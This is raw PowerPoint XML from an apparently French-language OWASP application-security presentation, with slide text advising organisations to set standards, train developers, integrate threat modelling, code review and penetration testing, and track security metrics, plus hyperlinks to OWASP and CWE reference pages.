          <a:ext cx="93702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just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Adoptez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>une</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>liste</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>précise</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t>normes</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId6"/>
            </a:rPr>
            <a:t> et standards</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>définissant les règles de base de la sécurité des applications qui devront être adoptées par les équipes de développement.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Définissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>une</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId7"/>
            </a:rPr>
            <a:t>liste commune de contrôles périodiques </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>qui complètent ces </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>politiques et normes et qui fournisse </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>les conseils  de conception et de développement sur leur utilisation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Mettez en place un </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId8"/>
            </a:rPr>
            <a:t>programme de formation spécifique à la sécurité des applications</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> s'adressant aux différents métiers et sujets de développement.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1929496" y="2625230"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="990602" y="2462361"/>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fr-FR" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Partez sur des bases solides</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1036435" y="2508194"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4344335" y="1394490"/>
          <a:ext cx="937021" cy="5766700"/>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just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Définissez et intégrez les activités </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId9"/>
            </a:rPr>
            <a:t>d’implémentation</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> et de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>vérification</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t> de la sécurité dans les processus de </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>développement et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" b="0" i="0" kern="1200" dirty="0" smtClean="0"/>
            <a:t>opérationnels existant</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>. Les activités comprennent </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>modélisation des menaces</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, conception sécurisée &amp; </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>review</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, programmation sécurisée et </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>revue de code</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>tests de pénétration</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> et remédiation.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Fournissez</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>des </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>services de support et d’</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>expertise</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t> à disposition des équipes de développement et de gestion de projet</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t> pour réussir.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1929496" y="3855071"/>
        <a:ext cx="5720958" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="990602" y="3692202"/>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fr-FR" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Intégrez la sécurité dans les processus existants</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1036435" y="3738035"/>
        <a:ext cx="847227" cy="1079611"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4240761" y="2727906"/>
          <a:ext cx="93702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just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Gérez avec des métriques. Pilotez les décisions de financement et d'amélioration en vous basant sur les métriques et les données d'analyse recensées. Les métriques comprennent le respect des pratiques / activités de sécurité, les vulnérabilités introduites, les vulnérabilités atténuées, la couverture de l'application,  la densité de défauts par type et par nombre d'instances, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>etc</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="just" defTabSz="444500" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Analysez les données des activités de mise en œuvre et de vérification pour rechercher la  cause première et des modèles de vulnérabilité pour conduire des améliorations stratégiques et systémiques à travers l'entreprise</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1929496" y="5084913"/>
        <a:ext cx="5513810" cy="845537"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="990602" y="4922043"/>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fr-FR" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Rendez vos indicateurs visibles</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1050" b="1" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1036435" y="4967876"/>
        <a:ext cx="847227" cy="107961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807" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95939" tIns="47969" rIns="95939" bIns="47969" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3899000" y="0"/>
            <a:ext cx="2982807" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95939" tIns="47969" rIns="95939" bIns="47969" rtlCol="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{6C875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6/20/2013</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Image Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2049463" y="742950"/>
            <a:ext cx="2784475" cy="3714750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:solidFill>
              <a:prstClr val="black"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95939" tIns="47969" rIns="95939" bIns="47969" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Notes Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="688340" y="4705350"/>
            <a:ext cx="5506720" cy="4457700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95939" tIns="47969" rIns="95939" bIns="4796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08981"/>
            <a:ext cx="2982807" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95939" tIns="47969" rIns="95939" bIns="47969"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99000" y="9408981"/>
            <a:ext cx="2982807" cy="495300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="95939" tIns="47969" rIns="95939" bIns="47969" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹N°›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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006147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solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>15</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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1700875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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3636452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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2412920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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1670170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we squeeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a mention of ‘parameter tampering’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.</a:t>
            </a:r>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‹N°›</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smtClean="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smtClean="0"/>
              <a:t>Enter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5" r:id="rId2"/>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XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/Encoder.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_Based_XSS" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Data_Validation"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ASVS" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><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hyperlink" Target="http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.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hyperlink" Target="https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcmag.com/article2/0,2817,11525,00.asp" TargetMode="Externa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notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmark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Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship 